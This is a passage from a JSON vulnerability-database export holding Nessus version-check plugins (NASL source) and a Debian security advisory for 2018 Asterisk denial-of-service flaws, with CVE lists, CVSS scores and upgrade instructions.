It is therefore, affected by\na Multiple Denial of Service Vulnerabilities as described in\nAST-2018-002, AST-2018-003, AST-2018-004, & AST-2018-005 advisories.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-03-02T00:00:00", "title": "Asterisk 13.x < 13.19.2 / 14.x < 14.7.6 / 13.13 < 13.18-cert3 Multiple DoS Vulnerabilities (AST-2018-002, AST-2018-003, AST-2018-004, & AST-2018-005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-7284"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2018_002-005.NASL", "href": "https://www.tenable.com/plugins/nessus/107101", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107101);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2018-7284\", \"CVE-2018-7286\");\n script_bugtraq_id(103129, 103151);\n\n script_name(english:\"Asterisk 13.x < 13.19.2 / 14.x < 14.7.6 / 13.13 < 13.18-cert3 Multiple DoS Vulnerabilities (AST-2018-002, AST-2018-003, AST-2018-004, & AST-2018-005)\");\n script_summary(english:\"Checks the version in the SIP banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\na Subscribe request crash vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its SIP banner, the version of Asterisk running on the\nremote host is 13.x prior to 13.19.2, 14.x prior to 14.7.6, or 13.18\nprior to 13.18-cert3. 
It is therefore, affected by\na Multiple Denial of Service Vulnerabilities as described in\nAST-2018-002, AST-2018-003, AST-2018-004, & AST-2018-005 advisories.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-003.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-005.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk version 13.19.2 / 14.7.6 / 13.18-cert3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7284\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 
2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\nasterisk_kbs = get_kb_list_or_exit(\"sip/asterisk/*/version\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = pregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of installation on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing;\n # log error and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n if (version =~ \"^13([^0-9])\" && \"cert\" >!< tolower(version))\n {\n fixed = \"13.19.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n else if (version =~ \"^14([^0-9])\" && \"cert\" >!< tolower(version))\n {\n fixed = \"14.7.6\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n else if (version =~ \"^13\\.18([^0-9])\" && \"cert\" >< tolower(version))\n {\n fixed = \"13.18-cert3\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n report =\n '\\n Version 
source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_report_v4(severity:SECURITY_WARNING, port:port, proto:proto, extra:report);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installations : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln) exit(0);\n else audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk\", not_vuln_installs);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T02:42:56", "description": "The Asterisk project reports :\n\nAST-2018-004 - When processing a SUBSCRIBE request the\nres_pjsip_pubsub module stores the accepted formats present in the\nAccept headers of the request. This code did not limit the number of\nheaders it processed despite having a fixed limit of 32. If more than\n32 Accept headers were present the code would write outside of its\nmemory and cause a crash.\n\nAST-2018-005 - A crash occurs when a number of authenticated INVITE\nmessages are sent over TCP or TLS and then the connection is suddenly\nclosed. 
This issue leads to a segmentation fault.", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-02-23T00:00:00", "title": "FreeBSD : asterisk -- multiple vulnerabilities (933654ce-17b8-11e8-90b8-001999f8d30b)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-7284"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:asterisk13"], "id": "FREEBSD_PKG_933654CE17B811E890B8001999F8D30B.NASL", "href": "https://www.tenable.com/plugins/nessus/106959", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106959);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/04/05 23:25:06\");\n\n script_cve_id(\"CVE-2018-7284\", \"CVE-2018-7286\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (933654ce-17b8-11e8-90b8-001999f8d30b)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk project reports :\n\nAST-2018-004 - When processing a SUBSCRIBE request the\nres_pjsip_pubsub module stores the accepted formats present in the\nAccept headers of the request. This code did not limit the number of\nheaders it processed despite having a fixed limit of 32. If more than\n32 Accept headers were present the code would write outside of its\nmemory and cause a crash.\n\nAST-2018-005 - A crash occurs when a number of authenticated INVITE\nmessages are sent over TCP or TLS and then the connection is suddenly\nclosed. 
This issue leads to a segmentation fault.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://downloads.asterisk.org/pub/security/AST-2018-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://downloads.asterisk.org/pub/security/AST-2018-005.html\"\n );\n # https://vuxml.freebsd.org/freebsd/933654ce-17b8-11e8-90b8-001999f8d30b.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a1cc5a90\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk13\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk13<13.19.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:21:47", "description": "According to its SIP banner, the version of Asterisk running on the\nremote host is 15.x prior to 15.2.2. 
It is therefore, affected by\nmultiple vulnerabilities as described in AST-2018-001, \nAST-2018-002, AST-2018-003, AST-2018-004, AST-2018-005,\n& AST-2018-006 advisories.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 29, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-03-02T00:00:00", "title": "Asterisk 15.x < 15.2.2 Multiple Vulnerabilities (AST-2018-001 - AST-2018-006)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-7284", "CVE-2018-7285", "CVE-2018-7287"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2018_001-006.NASL", "href": "https://www.tenable.com/plugins/nessus/107100", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(107100);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\n \"CVE-2018-7284\",\n \"CVE-2018-7285\",\n \"CVE-2018-7286\",\n \"CVE-2018-7287\"\n );\n script_bugtraq_id(\n 103120,\n 103129,\n 103149,\n 103151\n );\n\n script_name(english:\"Asterisk 15.x < 15.2.2 Multiple Vulnerabilities (AST-2018-001 - AST-2018-006)\");\n script_summary(english:\"Checks the version in the SIP banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its SIP banner, the version of Asterisk running on the\nremote host is 15.x prior to 15.2.2. 
It is therefore, affected by\nmultiple vulnerabilities as described in AST-2018-001, \nAST-2018-002, AST-2018-003, AST-2018-004, AST-2018-005,\n& AST-2018-006 advisories.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-002.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-003.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-004.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-005.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2018-006.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk version 15.2.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7285\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\nasterisk_kbs = get_kb_list_or_exit(\"sip/asterisk/*/version\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = pregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from '\"+kb_name+\"'.\");\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of installation on \" + proto + \"/\" + port + \".\");\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing;\n # log error and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing.\");\n banner = 'unknown';\n }\n\n if (version =~ \"^15([^0-9])\" && \"cert\" >!< tolower(version))\n {\n fixed = \"15.2.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n 
security_report_v4(severity:SECURITY_WARNING, port:port, proto:proto, extra:report);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installations : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln) exit(0);\n else audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk\", not_vuln_installs);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T01:48:57", "description": "Multiple vulnerabilities have been discovered in Asterisk, an open\nsource PBX and telephony toolkit, which may result in denial of\nservice or information disclosure.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2018-10-17T00:00:00", "title": "Debian DSA-4320-1 : asterisk - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7286", "CVE-2018-12227", "CVE-2018-7284", "CVE-2018-17281"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4320.NASL", "href": "https://www.tenable.com/plugins/nessus/118158", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4320. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118158);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-12227\", \"CVE-2018-17281\", \"CVE-2018-7284\", \"CVE-2018-7286\");\n script_xref(name:\"DSA\", value:\"4320\");\n\n script_name(english:\"Debian DSA-4320-1 : asterisk - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in Asterisk, an open\nsource PBX and telephony toolkit, which may result in denial of\nservice or information disclosure.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891227\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=891228\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=902954\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=909554\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4320\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 1:13.14.1~dfsg-2+deb9u4.\"\n );\n 
script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"asterisk\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-config\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-dahdi\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-dev\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-doc\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-mobile\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-modules\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-mp3\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-mysql\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-ooh323\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-voicemail\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-voicemail-imapstorage\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-voicemail-odbcstorage\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) 
flag++;\nif (deb_check(release:\"9.0\", prefix:\"asterisk-vpb\", reference:\"1:13.14.1~dfsg-2+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2020-08-12T00:58:06", "bulletinFamily": "unix", "cvelist": ["CVE-2018-7286", "CVE-2018-12227", "CVE-2018-7284", "CVE-2018-17281"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4320-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nOctober 16, 2018 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nCVE ID : CVE-2018-7284 CVE-2018-7286 CVE-2018-12227 CVE-2018-17281\nDebian Bug : 891227 891228 902954 909554\n\nMultiple vulnerabilities have been discovered in Asterisk, an open source\nPBX and telephony toolkit, which may result in denial of service or\ninformation disclosure.\n\t\t \nFor the stable distribution (stretch), these problems have been fixed in\nversion 1:13.14.1~dfsg-2+deb9u4.\n\nWe recommend that you upgrade your asterisk packages.\n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 8, "modified": "2018-10-16T21:54:44", "published": "2018-10-16T21:54:44", "id": "DEBIAN:DSA-4320-1:78762", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2018/msg00251.html", "title": "[SECURITY] [DSA 4320-1] asterisk security 
update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}